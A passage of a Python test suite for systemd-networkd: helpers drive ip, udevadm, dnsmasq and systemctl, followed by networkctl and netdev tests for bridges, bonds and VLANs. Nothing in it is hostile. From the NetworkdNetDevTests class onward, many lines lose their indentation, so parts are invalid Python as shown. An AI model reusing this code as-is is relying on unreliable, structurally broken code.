    The first argument may contain spaces and is split into argv words;
    this replaces both check_output and check_call (output can be ignored).
    """
    argv = command[0].split() + list(command[1:])
    return subprocess.check_output(argv, universal_newlines=True, **kwargs).rstrip()
def call(*command, **kwargs):
    """Run *command* (first argument split on spaces); return its exit code."""
    argv = command[0].split() + list(command[1:])
    return subprocess.call(argv, universal_newlines=True, **kwargs)
def run(*command, **kwargs):
    """Run *command* (first argument split on spaces); return CompletedProcess."""
    argv = command[0].split() + list(command[1:])
    return subprocess.run(argv, universal_newlines=True, **kwargs)
def is_module_available(module_name):
    """True when *module_name* is already loaded, or modprobe can load it."""
    loaded_re = re.compile(rf'^{re.escape(module_name)}\b', re.MULTILINE)
    if loaded_re.search(check_output('lsmod')):
        return True
    return not call('modprobe', module_name, stderr=subprocess.DEVNULL)
def expectedFailureIfModuleIsNotAvailable(module_name):
    """Mark a test as an expected failure unless the kernel module is usable."""
    def decorator(func):
        if is_module_available(module_name):
            return func
        return unittest.expectedFailure(func)
    return decorator
def expectedFailureIfERSPANModuleIsNotAvailable():
    """Expected failure unless an erspan tunnel can actually be created."""
    def decorator(func):
        rc = call('ip link add dev erspan99 type erspan seq key 30 local 192.168.1.4 remote 192.168.1.1 erspan_ver 1 erspan 123', stderr=subprocess.DEVNULL)
        if rc != 0:
            return unittest.expectedFailure(func)
        call('ip link del erspan99')
        return func
    return decorator
def expectedFailureIfRoutingPolicyPortRangeIsNotAvailable():
    """Expected failure unless 'ip rule' supports sport/dport ranges."""
    def decorator(func):
        rc = call('ip rule add from 192.168.100.19 sport 1123-1150 dport 3224-3290 table 7', stderr=subprocess.DEVNULL)
        if rc != 0:
            return unittest.expectedFailure(func)
        call('ip rule del from 192.168.100.19 sport 1123-1150 dport 3224-3290 table 7')
        return func
    return decorator
def expectedFailureIfRoutingPolicyIPProtoIsNotAvailable():
    """Expected failure unless 'ip rule' supports the ipproto selector."""
    def decorator(func):
        rc = call('ip rule add not from 192.168.100.19 ipproto tcp table 7', stderr=subprocess.DEVNULL)
        if rc != 0:
            return unittest.expectedFailure(func)
        call('ip rule del not from 192.168.100.19 ipproto tcp table 7')
        return func
    return decorator
def expectedFailureIfLinkFileFieldIsNotSet():
    """Expected failure unless udev reports ID_NET_LINK_FILE for new links."""
    def decorator(func):
        supported = False
        if call('ip link add name dummy99 type dummy', stderr=subprocess.DEVNULL) == 0:
            ret = run('udevadm info -w10s /sys/class/net/dummy99', stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
            if ret.returncode == 0 and 'E: ID_NET_LINK_FILE=' in ret.stdout.rstrip():
                supported = True
            call('ip link del dummy99')
        return func if supported else unittest.expectedFailure(func)
    return decorator
def expectedFailureIfNexthopIsNotAvailable():
    """Expected failure unless 'ip nexthop' is supported by the kernel."""
    def decorator(func):
        if call('ip nexthop list', stderr=subprocess.DEVNULL) == 0:
            return func
        return unittest.expectedFailure(func)
    return decorator
def expectedFailureIfAlternativeNameIsNotAvailable():
    """Expected failure unless 'ip link prop add ... altname' works."""
    def decorator(func):
        call('ip link add dummy98 type dummy', stderr=subprocess.DEVNULL)
        rc = call('ip link prop add dev dummy98 altname hogehogehogehogehoge', stderr=subprocess.DEVNULL)
        if rc == 0:
            return func
        return unittest.expectedFailure(func)
    return decorator
def _build_drop_in(executable, unit_lines=(), valgrind_extra=()):
    # Build the override drop-in lines shared by the networkd and resolved
    # services (the original code duplicated this block verbatim).
    drop_in = list(unit_lines) + [
        '[Service]',
        'Restart=no',
        'ExecStart=',
    ]
    if use_valgrind:
        drop_in += ['ExecStart=!!valgrind --track-origins=yes --leak-check=full --show-leak-kinds=all ' + executable]
        drop_in += list(valgrind_extra)
    else:
        drop_in += ['ExecStart=!!' + executable]
    if enable_debug:
        drop_in += ['Environment=SYSTEMD_LOG_LEVEL=debug']
    if asan_options:
        drop_in += ['Environment=ASAN_OPTIONS="' + asan_options + '"']
    if lsan_options:
        drop_in += ['Environment=LSAN_OPTIONS="' + lsan_options + '"']
    if ubsan_options:
        drop_in += ['Environment=UBSAN_OPTIONS="' + ubsan_options + '"']
    if asan_options or lsan_options or ubsan_options:
        drop_in += ['SystemCallFilter=']
    if use_valgrind or asan_options or lsan_options or ubsan_options:
        drop_in += ['MemoryDenyWriteExecute=no']
    return drop_in
def _install_drop_in(service, drop_in):
    # Write the override under /run so it disappears on reboot.
    dropin_dir = f'/run/systemd/system/{service}.d'
    os.makedirs(dropin_dir, exist_ok=True)
    with open(os.path.join(dropin_dir, '00-override.conf'), mode='w') as f:
        f.write('\n'.join(drop_in))
def setUpModule():
    """Prepare the testbed: copy config, stop interfering services, and
    install instrumented service overrides for networkd and resolved."""
    global running_units
    os.makedirs(network_unit_file_path, exist_ok=True)
    os.makedirs(networkd_ci_path, exist_ok=True)
    # start from a pristine copy of the test configuration
    shutil.rmtree(networkd_ci_path)
    copytree(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'conf'), networkd_ci_path)
    # remember which units were active so tearDownModule can restart them
    for u in ['systemd-networkd.socket', 'systemd-networkd.service', 'systemd-resolved.service', 'firewalld.service']:
        if call(f'systemctl is-active --quiet {u}') == 0:
            check_output(f'systemctl stop {u}')
            running_units.append(u)
    _install_drop_in('systemd-networkd.service',
                     _build_drop_in(networkd_bin,
                                    unit_lines=['[Unit]', 'StartLimitIntervalSec=0'],
                                    valgrind_extra=['PrivateTmp=yes']))
    _install_drop_in('systemd-resolved.service',
                     _build_drop_in(resolved_bin))
    check_output('systemctl daemon-reload')
    print(check_output('systemctl cat systemd-networkd.service'))
    print(check_output('systemctl cat systemd-resolved.service'))
    check_output('systemctl restart systemd-resolved')
def tearDownModule():
    """Undo setUpModule: drop the overrides and test data, then restart
    whatever units were running before the test session."""
    global running_units
    shutil.rmtree(networkd_ci_path)
    for u in ['systemd-networkd.service', 'systemd-resolved.service']:
        check_output(f'systemctl stop {u}')
    shutil.rmtree('/run/systemd/system/systemd-networkd.service.d')
    shutil.rmtree('/run/systemd/system/systemd-resolved.service.d')
    check_output('systemctl daemon-reload')
    for u in running_units:
        check_output(f'systemctl start {u}')
def read_link_attr(*args):
    """Read one sysfs attribute under /sys/class/net/ (path parts in *args)."""
    attr_path = os.path.join('/sys/class/net/', *args)
    with open(attr_path) as f:
        return f.readline().strip()
def read_bridge_port_attr(bridge, link, attribute):
    """Read a brport attribute of *link* while it is enslaved to *bridge*."""
    attr_path = os.path.join('/sys/devices/virtual/net', bridge,
                             'lower_' + link + '/brport', attribute)
    with open(attr_path) as f:
        return f.readline().strip()
def link_exists(link):
    """True when the network interface *link* is present in /sys/class/net."""
    sysfs_entry = os.path.join('/sys/class/net', link)
    return os.path.exists(sysfs_entry)
def remove_links(links):
    # Delete each interface that still exists, then give the kernel a moment
    # to finish the removals before the next test starts.
    for link in links:
        if link_exists(link):
            call('ip link del dev', link)
    time.sleep(1)
def remove_fou_ports(ports):
    # Best effort: a port may not exist, so all output/errors are discarded.
    for port in ports:
        call('ip fou del port', port, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def remove_routing_policy_rule_tables(tables):
    """Delete every routing-policy rule in each of the given tables."""
    for table in tables:
        # keep deleting until 'ip rule del' reports nothing is left
        while call('ip rule del table', table, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) == 0:
            pass
def remove_routes(routes):
    # routes is an iterable of (type, destination) pairs; best-effort delete.
    for route_type, addr in routes:
        call('ip route del', route_type, addr, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def remove_l2tp_tunnels(tunnel_ids):
    """Delete the listed L2TP tunnels if 'ip l2tp show tunnel' knows them."""
    existing = check_output('ip l2tp show tunnel')
    for tid in tunnel_ids:
        if 'Tunnel ' + tid + ', encap' in existing:
            call('ip l2tp del tunnel tid', tid)
    time.sleep(1)
def read_ipv6_sysctl_attr(link, attribute):
    """Read a per-interface IPv6 sysctl value from /proc."""
    with open(os.path.join(network_sysctl_ipv6_path, link, attribute)) as f:
        return f.readline().strip()
def read_ipv4_sysctl_attr(link, attribute):
    """Read a per-interface IPv4 sysctl value from /proc."""
    with open(os.path.join(network_sysctl_ipv4_path, link, attribute)) as f:
        return f.readline().strip()
def copy_unit_to_networkd_unit_path(*units, dropins=True):
    """Copy networkd unit files into the testbed.
    Any networkd unit file type can be specified, as well as drop-in files.
    By default, all drop-ins for a specified unit file are copied in;
    to avoid that specify dropins=False.
    When a drop-in file is specified, its unit file is also copied in automatically.
    """
    print()
    for unit in units:
        dropin_src = os.path.join(networkd_ci_path, unit + '.d')
        if dropins and os.path.exists(dropin_src):
            copytree(dropin_src, os.path.join(network_unit_file_path, unit + '.d'))
        if unit.endswith('.conf'):
            # a drop-in .conf: install it, then fall through to copying
            # its owning unit file as well
            target_dir = os.path.join(network_unit_file_path, os.path.dirname(unit))
            os.makedirs(target_dir, exist_ok=True)
            shutil.copy(os.path.join(networkd_ci_path, unit), target_dir)
            unit = os.path.dirname(unit).rstrip('.d')
        shutil.copy(os.path.join(networkd_ci_path, unit), network_unit_file_path)
def remove_unit_from_networkd_path(units):
    """Remove previously copied unit files from the testbed.
    Drop-ins will be removed automatically.
    """
    for unit in units:
        unit_path = os.path.join(network_unit_file_path, unit)
        if os.path.exists(unit_path):
            os.remove(unit_path)
        dropin_path = unit_path + '.d'
        if os.path.exists(dropin_path):
            shutil.rmtree(dropin_path)
def start_dnsmasq(additional_options='', ipv4_range='192.168.5.10,192.168.5.200', ipv6_range='2600::10,2600::20', lease_time='1h'):
    # Launch dnsmasq on veth-peer as a combined DHCPv4/DHCPv6/RA server with
    # verbose logging; --port=0 disables its DNS server. Log, pid and lease
    # files live under /var/run/networkd-ci (see the module constants).
    dnsmasq_command = f'dnsmasq -8 /var/run/networkd-ci/test-dnsmasq-log-file --log-queries=extra --log-dhcp --pid-file=/var/run/networkd-ci/test-test-dnsmasq.pid --conf-file=/dev/null --interface=veth-peer --enable-ra --dhcp-range={ipv6_range},{lease_time} --dhcp-range={ipv4_range},{lease_time} -R --dhcp-leasefile=/var/run/networkd-ci/lease --dhcp-option=26,1492 --dhcp-option=option:router,192.168.5.1 --dhcp-option=33,192.168.5.4,192.168.5.5 --port=0 ' + additional_options
    check_output(dnsmasq_command)
def stop_dnsmasq(pid_file):
    """Terminate the dnsmasq instance recorded in *pid_file* and remove it.

    A missing pid file means dnsmasq was never started; nothing happens.
    """
    if not os.path.exists(pid_file):
        return
    with open(pid_file, 'r') as f:
        pid = f.read().rstrip(' \t\r\n\0')
    os.kill(int(pid), signal.SIGTERM)
    os.remove(pid_file)
def search_words_in_dnsmasq_log(words, show_all=False):
    """Return True when *words* occurs on some line of the dnsmasq log.

    Args:
        words: substring to look for (matched per line).
        show_all: when True, dump the whole log to stdout first.
    """
    if not os.path.exists(dnsmasq_log_file):
        return False
    # FIX: the original called in_file.close() inside the with-block,
    # which the context manager already handles.
    with open(dnsmasq_log_file) as in_file:
        contents = in_file.read()
    if show_all:
        print(contents)
    for line in contents.splitlines():
        if words in line:
            print(f'{words}, {line}')
            return True
    return False
def remove_lease_file():
    # Drop the dnsmasq lease file left behind by a previous run, if any.
    if os.path.exists(os.path.join(networkd_ci_path, 'lease')):
        os.remove(os.path.join(networkd_ci_path, 'lease'))
def remove_log_file():
    # Drop the dnsmasq log file left behind by a previous run, if any.
    if os.path.exists(dnsmasq_log_file):
        os.remove(dnsmasq_log_file)
def remove_networkd_state_files():
    # Remove networkd's persistent state so the next start is pristine.
    if os.path.exists(os.path.join(networkd_runtime_directory, 'state')):
        os.remove(os.path.join(networkd_runtime_directory, 'state'))
def stop_networkd(show_logs=True, remove_state_files=True):
    # Capture the invocation id before stopping so we can dump exactly this
    # run's journal entries afterwards.
    if show_logs:
        invocation_id = check_output('systemctl show systemd-networkd -p InvocationID --value')
    check_output('systemctl stop systemd-networkd')
    if show_logs:
        print(check_output('journalctl _SYSTEMD_INVOCATION_ID=' + invocation_id))
    if remove_state_files:
        remove_networkd_state_files()
def start_networkd(sleep_sec=0):
    # Optionally wait a bit to let networkd settle before the test proceeds.
    check_output('systemctl start systemd-networkd')
    if sleep_sec > 0:
        time.sleep(sleep_sec)
def restart_networkd(sleep_sec=0, show_logs=True, remove_state_files=True):
    # Convenience wrapper: stop (optionally dumping logs/state) then start.
    stop_networkd(show_logs, remove_state_files)
    start_networkd(sleep_sec)
def get_operstate(link, show_status=True, setup_state='configured'):
    # Parse 'networkctl status <link>': return the word after 'State:' on the
    # line that also mentions setup_state (when given), or None if no line
    # matches.
    output = check_output(*networkctl_cmd, 'status', link, env=env)
    if show_status:
        print(output)
    for line in output.splitlines():
        if 'State:' in line and (not setup_state or setup_state in line):
            return line.split()[1]
    return None
class Utilities():
    """Assertion helpers mixed into the test case classes."""
    def check_link_exists(self, link):
        """Assert that the network interface *link* exists."""
        self.assertTrue(link_exists(link))
    def check_operstate(self, link, expected, show_status=True, setup_state='configured'):
        """Assert that *link*'s operational state matches regex *expected*."""
        self.assertRegex(get_operstate(link, show_status, setup_state), expected)
    def wait_online(self, links_with_operstate, timeout='20s', bool_any=False, setup_state='configured', setup_timeout=5):
        """Wait for the given links ('name' or 'name:min-operstate') to come
        online, then poll up to *setup_timeout* seconds for *setup_state*.

        On wait-online failure, dumps 'networkctl status' for each link and
        re-raises the CalledProcessError.
        """
        args = wait_online_cmd + [f'--timeout={timeout}'] + [f'--interface={link}' for link in links_with_operstate]
        if bool_any:
            args += ['--any']
        try:
            check_output(*args, env=env)
        except subprocess.CalledProcessError:
            for link in links_with_operstate:
                output = check_output(*networkctl_cmd, 'status', link.split(':')[0], env=env)
                print(output)
            raise
        if not bool_any and setup_state:
            # check at least once now, then once per sec for setup_timeout secs
            for secs in range(setup_timeout + 1):
                for link in links_with_operstate:
                    # FIX: pass env here too, consistent with every other
                    # networkctl invocation in this file
                    output = check_output(*networkctl_cmd, 'status', link.split(':')[0], env=env)
                    print(output)
                    if not re.search(rf'(?m)^\s*State:.*({setup_state}).*$', output):
                        # this link isn't in the right state; break into the sleep below
                        break
                else:
                    # all the links were in the right state; break to exit the timer loop
                    break
                # don't bother sleeping if time is up
                if secs < setup_timeout:
                    time.sleep(1)
            else:
                self.fail(f'link {link} state does not match {setup_state}')
    def wait_address(self, link, address_regex, scope='global', ipv='', timeout_sec=100):
        """Poll 'ip address show' for *link* until *address_regex* matches,
        asserting the match when the timeout expires."""
        for i in range(timeout_sec):
            if i > 0:
                time.sleep(1)
            output = check_output(f'ip {ipv} address show dev {link} scope {scope}')
            if re.search(address_regex, output):
                break
        else:
            self.assertRegex(output, address_regex)
class NetworkctlTests(unittest.TestCase, Utilities):
    """Tests for the networkctl command-line tool."""
    # interfaces these tests create; removed again in setUp/tearDown
    links = [
        'dummy98',
        'test1',
        'veth99',
    ]
    # unit files copied into the testbed; removed again in tearDown
    units = [
        '11-dummy.netdev',
        '11-dummy-mtu.netdev',
        '11-dummy.network',
        '12-dummy.netdev',
        '12-dummy.link',
        '25-address-static.network',
        '25-veth.netdev',
        'netdev-link-local-addressing-yes.network',
    ]
    def setUp(self):
        remove_links(self.links)
        stop_networkd(show_logs=False)
    def tearDown(self):
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)
    @expectedFailureIfAlternativeNameIsNotAvailable()
    def test_altname(self):
        # the altname is configured via 12-dummy.link; networkctl status
        # should report it
        copy_unit_to_networkd_unit_path('netdev-link-local-addressing-yes.network', '12-dummy.netdev', '12-dummy.link')
        check_output('udevadm control --reload')
        start_networkd()
        self.wait_online(['dummy98:degraded'])
        output = check_output(*networkctl_cmd, 'status', 'dummy98', env=env)
        self.assertRegex(output, 'hogehogehogehogehogehoge')
    def test_reconfigure(self):
        # delete the statically configured addresses, then verify that
        # 'networkctl reconfigure' restores all three of them
        copy_unit_to_networkd_unit_path('25-address-static.network', '12-dummy.netdev')
        start_networkd()
        self.wait_online(['dummy98:routable'])
        output = check_output('ip -4 address show dev dummy98')
        print(output)
        self.assertRegex(output, 'inet 10.1.2.3/16 brd 10.1.255.255 scope global dummy98')
        self.assertRegex(output, 'inet 10.1.2.4/16 brd 10.1.255.255 scope global secondary dummy98')
        self.assertRegex(output, 'inet 10.2.2.4/16 brd 10.2.255.255 scope global dummy98')
        check_output('ip address del 10.1.2.3/16 dev dummy98')
        check_output('ip address del 10.1.2.4/16 dev dummy98')
        check_output('ip address del 10.2.2.4/16 dev dummy98')
        check_output(*networkctl_cmd, 'reconfigure', 'dummy98', env=env)
        self.wait_online(['dummy98:routable'])
        output = check_output('ip -4 address show dev dummy98')
        print(output)
        self.assertRegex(output, 'inet 10.1.2.3/16 brd 10.1.255.255 scope global dummy98')
        self.assertRegex(output, 'inet 10.1.2.4/16 brd 10.1.255.255 scope global secondary dummy98')
        self.assertRegex(output, 'inet 10.2.2.4/16 brd 10.2.255.255 scope global dummy98')
    def test_reload(self):
        # exercise 'networkctl reload' while adding/removing .netdev and
        # .network files step by step
        start_networkd(3)
        copy_unit_to_networkd_unit_path('11-dummy.netdev')
        check_output(*networkctl_cmd, 'reload', env=env)
        time.sleep(3)
        self.check_link_exists('test1')
        self.check_operstate('test1', 'off', setup_state='unmanaged')
        copy_unit_to_networkd_unit_path('11-dummy.network')
        check_output(*networkctl_cmd, 'reload', env=env)
        self.wait_online(['test1:degraded'])
        remove_unit_from_networkd_path(['11-dummy.network'])
        check_output(*networkctl_cmd, 'reload', env=env)
        time.sleep(1)
        self.check_operstate('test1', 'degraded', setup_state='unmanaged')
        remove_unit_from_networkd_path(['11-dummy.netdev'])
        check_output(*networkctl_cmd, 'reload', env=env)
        self.check_operstate('test1', 'degraded', setup_state='unmanaged')
        copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network')
        check_output(*networkctl_cmd, 'reload', env=env)
        self.check_operstate('test1', 'degraded')
    def test_glob(self):
        # 'list' and 'status' accept names and shell-style globs
        copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network')
        start_networkd()
        self.wait_online(['test1:degraded'])
        output = check_output(*networkctl_cmd, 'list', env=env)
        self.assertRegex(output, '1 lo ')
        self.assertRegex(output, 'test1')
        output = check_output(*networkctl_cmd, 'list', 'test1', env=env)
        self.assertNotRegex(output, '1 lo ')
        self.assertRegex(output, 'test1')
        output = check_output(*networkctl_cmd, 'list', 'te*', env=env)
        self.assertNotRegex(output, '1 lo ')
        self.assertRegex(output, 'test1')
        output = check_output(*networkctl_cmd, 'status', 'te*', env=env)
        self.assertNotRegex(output, '1: lo ')
        self.assertRegex(output, 'test1')
        output = check_output(*networkctl_cmd, 'status', 'tes[a-z][0-9]', env=env)
        self.assertNotRegex(output, '1: lo ')
        self.assertRegex(output, 'test1')
    def test_mtu(self):
        # MTU comes from 11-dummy-mtu.netdev
        copy_unit_to_networkd_unit_path('11-dummy-mtu.netdev', '11-dummy.network')
        start_networkd()
        self.wait_online(['test1:degraded'])
        output = check_output(*networkctl_cmd, 'status', 'test1', env=env)
        self.assertRegex(output, 'MTU: 1600')
    def test_type(self):
        copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network')
        start_networkd()
        self.wait_online(['test1:degraded'])
        output = check_output(*networkctl_cmd, 'status', 'test1', env=env)
        print(output)
        self.assertRegex(output, 'Type: ether')
        output = check_output(*networkctl_cmd, 'status', 'lo', env=env)
        print(output)
        self.assertRegex(output, 'Type: loopback')
    @expectedFailureIfLinkFileFieldIsNotSet()
    def test_udev_link_file(self):
        copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network')
        start_networkd()
        self.wait_online(['test1:degraded'])
        output = check_output(*networkctl_cmd, 'status', 'test1', env=env)
        print(output)
        self.assertRegex(output, r'Link File: (/usr)?/lib/systemd/network/99-default.link')
        self.assertRegex(output, r'Network File: /run/systemd/network/11-dummy.network')
        output = check_output(*networkctl_cmd, 'status', 'lo', env=env)
        print(output)
        self.assertRegex(output, r'Link File: (/usr)?/lib/systemd/network/99-default.link')
        self.assertRegex(output, r'Network File: n/a')
    def test_delete_links(self):
        # deleting veth99 must also remove its peer veth-peer
        copy_unit_to_networkd_unit_path('11-dummy.netdev', '11-dummy.network',
                                        '25-veth.netdev', 'netdev-link-local-addressing-yes.network')
        start_networkd()
        self.wait_online(['test1:degraded', 'veth99:degraded', 'veth-peer:degraded'])
        check_output(*networkctl_cmd, 'delete', 'test1', 'veth99', env=env)
        self.assertFalse(link_exists('test1'))
        self.assertFalse(link_exists('veth99'))
        self.assertFalse(link_exists('veth-peer'))
class NetworkdNetDevTests(unittest.TestCase, Utilities):
links_remove_earlier = [
'xfrm99',
]
links = [
'6rdtun99',
'bond99',
'bridge99',
'dropin-test',
'dummy98',
'erspan98',
'erspan99',
'geneve99',
'gretap96',
'gretap98',
'gretap99',
'gretun96',
'gretun97',
'gretun98',
'gretun99',
'ifb99',
'ip6gretap98',
'ip6gretap99',
'ip6gretun96',
'ip6gretun97',
'ip6gretun98',
'ip6gretun99',
'ip6tnl97',
'ip6tnl98',
'ip6tnl99',
'ipiptun96',
'ipiptun97',
'ipiptun98',
'ipiptun99',
'ipvlan99',
'ipvtap99',
'isataptun99',
'macvlan99',
'macvtap99',
'nlmon99',
'sittun96',
'sittun97',
'sittun98',
'sittun99',
'tap99',
'test1',
'tun99',
'vcan99',
'veth99',
'vlan99',
'vrf99',
'vti6tun97',
'vti6tun98',
'vti6tun99',
'vtitun96',
'vtitun97',
'vtitun98',
'vtitun99',
'vxcan99',
'vxlan99',
'wg98',
'wg99',
]
units = [
'10-dropin-test.netdev',
'11-dummy.netdev',
'11-dummy.network',
'12-dummy.netdev',
'13-not-match-udev-property.network',
'14-match-udev-property.network',
'15-name-conflict-test.netdev',
'21-macvlan.netdev',
'21-macvtap.netdev',
'21-vlan-test1.network',
'21-vlan.netdev',
'21-vlan.network',
'25-6rd-tunnel.netdev',
'25-bond.netdev',
'25-bond-balanced-tlb.netdev',
'25-bridge.netdev',
'25-bridge-configure-without-carrier.network',
'25-bridge.network',
'25-erspan-tunnel-local-any.netdev',
'25-erspan-tunnel.netdev',
'25-fou-gretap.netdev',
'25-fou-gre.netdev',
'25-fou-ipip.netdev',
'25-fou-ipproto-gre.netdev',
'25-fou-ipproto-ipip.netdev',
'25-fou-sit.netdev',
'25-geneve.netdev',
'25-gretap-tunnel-local-any.netdev',
'25-gretap-tunnel.netdev',
'25-gre-tunnel-any-any.netdev',
'25-gre-tunnel-local-any.netdev',
'25-gre-tunnel-remote-any.netdev',
'25-gre-tunnel.netdev',
'25-ifb.netdev',
'25-ip6gretap-tunnel-local-any.netdev',
'25-ip6gretap-tunnel.netdev',
'25-ip6gre-tunnel-any-any.netdev',
'25-ip6gre-tunnel-local-any.netdev',
'25-ip6gre-tunnel-remote-any.netdev',
'25-ip6gre-tunnel.netdev',
'25-ip6tnl-tunnel-any-any.netdev',
'25-ip6tnl-tunnel-local-any.netdev',
'25-ip6tnl-tunnel-remote-any.netdev',
'25-ip6tnl-tunnel.netdev',
'25-ipip-tunnel-any-any.netdev',
'25-ipip-tunnel-independent.netdev',
'25-ipip-tunnel-independent-loopback.netdev',
'25-ipip-tunnel-local-any.netdev',
'25-ipip-tunnel-remote-any.netdev',
'25-ipip-tunnel.netdev',
'25-ipvlan.netdev',
'25-ipvtap.netdev',
'25-isatap-tunnel.netdev',
'25-macsec.key',
'25-macsec.netdev',
'25-macsec.network',
'25-nlmon.netdev',
'25-sit-tunnel-any-any.netdev',
'25-sit-tunnel-local-any.netdev',
'25-sit-tunnel-remote-any.netdev',
'25-sit-tunnel.netdev',
'25-tap.netdev',
'25-tun.netdev',
'25-tunnel-local-any.network',
'25-tunnel-remote-any.network',
'25-tunnel.network',
'25-vcan.netdev',
'25-veth.netdev',
'25-vrf.netdev',
'25-vti6-tunnel-any-any.netdev',
'25-vti6-tunnel-local-any.netdev',
'25-vti6-tunnel-remote-any.netdev',
'25-vti6-tunnel.netdev',
'25-vti-tunnel-any-any.netdev',
'25-vti-tunnel-local-any.netdev',
'25-vti-tunnel-remote-any.netdev',
'25-vti-tunnel.netdev',
'25-vxcan.netdev',
'25-vxlan.netdev',
'25-wireguard-23-peers.netdev',
'25-wireguard-23-peers.network',
'25-wireguard-preshared-key.txt',
'25-wireguard-private-key.txt',
'25-wireguard.netdev',
'25-wireguard.network',
'25-xfrm.netdev',
'25-xfrm-independent.netdev',
'6rd.network',
'erspan.network',
'gre.network',
'gretap.network',
'gretun.network',
'ip6gretap.network',
'ip6gretun.network',
'ip6tnl.network',
'ipip.network',
'ipvlan.network',
'ipvtap.network',
'isatap.network',
'macsec.network',
'macvlan.network',
'macvtap.network',
'netdev-link-local-addressing-yes.network',
'sit.network',
'vti6.network',
'vti.network',
'vxlan-test1.network',
'vxlan.network',
'xfrm.network',
]
fou_ports = [
'55555',
'55556']
    def setUp(self):
        # Start from a clean slate: no fou ports, no leftover links (the
        # links_remove_earlier entries, e.g. xfrm99, go first), networkd down.
        remove_fou_ports(self.fou_ports)
        remove_links(self.links_remove_earlier)
        remove_links(self.links)
        stop_networkd(show_logs=False)
    def tearDown(self):
        # Clean up everything a test may have created and dump networkd's
        # journal for post-mortem inspection.
        remove_fou_ports(self.fou_ports)
        remove_links(self.links_remove_earlier)
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)
    def test_dropin_and_name_conflict(self):
        # Both netdev files define 'dropin-test'; the resulting link must
        # carry the expected MAC (presumably set via the 10-dropin-test
        # drop-in - confirm against conf/).
        copy_unit_to_networkd_unit_path('10-dropin-test.netdev', '15-name-conflict-test.netdev')
        start_networkd()
        self.wait_online(['dropin-test:off'], setup_state='unmanaged')
        output = check_output('ip link show dropin-test')
        print(output)
        self.assertRegex(output, '00:50:56:c0:00:28')
def test_match_udev_property(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', '13-not-match-udev-property.network', '14-match-udev-property.network')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output('networkctl status dummy98')
print(output)
self.assertRegex(output, 'Network File: /run/systemd/network/14-match-udev-property')
    def test_wait_online_any(self):
        # With --any, wait-online returns once either link is ready; bridge99
        # stays in (off|no-carrier) while test1 reaches degraded.
        copy_unit_to_networkd_unit_path('25-bridge.netdev', '25-bridge.network', '11-dummy.netdev', '11-dummy.network')
        start_networkd()
        self.wait_online(['bridge99', 'test1:degraded'], bool_any=True)
        self.check_operstate('bridge99', '(off|no-carrier)', setup_state='configuring')
        self.check_operstate('test1', 'degraded')
def test_bridge(self):
copy_unit_to_networkd_unit_path('25-bridge.netdev', '25-bridge-configure-without-carrier.network')
start_networkd()
self.wait_online(['bridge99:no-carrier'])
tick = os.sysconf('SC_CLK_TCK')
self.assertEqual(9, round(float(read_link_attr('bridge99', 'bridge', 'hello_time')) / tick))
self.assertEqual(9, round(float(read_link_attr('bridge99', 'bridge', 'max_age')) / tick))
self.assertEqual(9, round(float(read_link_attr('bridge99', 'bridge', 'forward_delay')) / tick))
self.assertEqual(9, round(float(read_link_attr('bridge99', 'bridge', 'ageing_time')) / tick))
self.assertEqual(9, int(read_link_attr('bridge99', 'bridge', 'priority')))
self.assertEqual(1, int(read_link_attr('bridge99', 'bridge', 'multicast_querier')))
self.assertEqual(1, int(read_link_attr('bridge99', 'bridge', 'multicast_snooping')))
self.assertEqual(1, int(read_link_attr('bridge99', 'bridge', 'stp_state')))
self.assertEqual(3, int(read_link_attr('bridge99', 'bridge', 'multicast_igmp_version')))
output = check_output(*networkctl_cmd, 'status', 'bridge99', env=env)
print(output)
self.assertRegex(output, 'Priority: 9')
self.assertRegex(output, 'STP: yes')
self.assertRegex(output, 'Multicast IGMP Version: 3')
def test_bond(self):
copy_unit_to_networkd_unit_path('25-bond.netdev', '25-bond-balanced-tlb.netdev')
start_networkd()
self.wait_online(['bond99:off', 'bond98:off'], setup_state='unmanaged')
self.assertEqual('802.3ad 4', read_link_attr('bond99', 'bonding', 'mode'))
self.assertEqual('layer3+4 1', read_link_attr('bond99', 'bonding', 'xmit_hash_policy'))
self.assertEqual('1000', read_link_attr('bond99', 'bonding', 'miimon'))
self.assertEqual('fast 1', read_link_attr('bond99', 'bonding', 'lacp_rate'))
self.assertEqual('2000', read_link_attr('bond99', 'bonding', 'updelay'))
self.assertEqual('2000', read_link_attr('bond99', 'bonding', 'downdelay'))
self.assertEqual('4', read_link_attr('bond99', 'bonding', 'resend_igmp'))
self.assertEqual('1', read_link_attr('bond99', 'bonding', 'min_links'))
self.assertEqual('1218', read_link_attr('bond99', 'bonding', 'ad_actor_sys_prio'))
self.assertEqual('811', read_link_attr('bond99', 'bonding', 'ad_user_port_key'))
self.assertEqual('00:11:22:33:44:55', read_link_attr('bond99', 'bonding', 'ad_actor_system'))
self.assertEqual('balance-tlb 5', read_link_attr('bond98', 'bonding', 'mode'))
self.assertEqual('1', read_link_attr('bond98', 'bonding', 'tlb_dynamic_lb'))
def test_vlan(self):
copy_unit_to_networkd_unit_path('21-vlan.netdev', '11-dummy.netdev',
'21-vlan.network', '21-vlan-test1.network')
start_networkd()
self.wait_online(['test1:degraded', 'vlan99:routable'])
output = check_output('ip -d link show test1')
print(output)
self.assertRegex(output, ' mtu 2000 ')
output = check_output('ip -d link show vlan99')
print(output)
self.assertRegex(output, ' mtu 2000 ')
self.assertRegex(output, 'REORDER_HDR')
self.assertRegex(output, 'LOOSE_BINDING')
self.assertRegex(output, 'GVRP')
self.assertRegex(output, 'MVRP')
self.assertRegex(output, ' id 99 ')
output = check_output('ip -4 address show dev test1')
print(output)
self.assertRegex(output, 'inet 192.168.24.5/24 brd 192.168.24.255 scope global test1')
self.assertRegex(output, 'inet 192.168.25.5/24 brd 192.168.25.255 scope global test1')
output = check_output('ip -4 address show dev vlan99')
print(output)
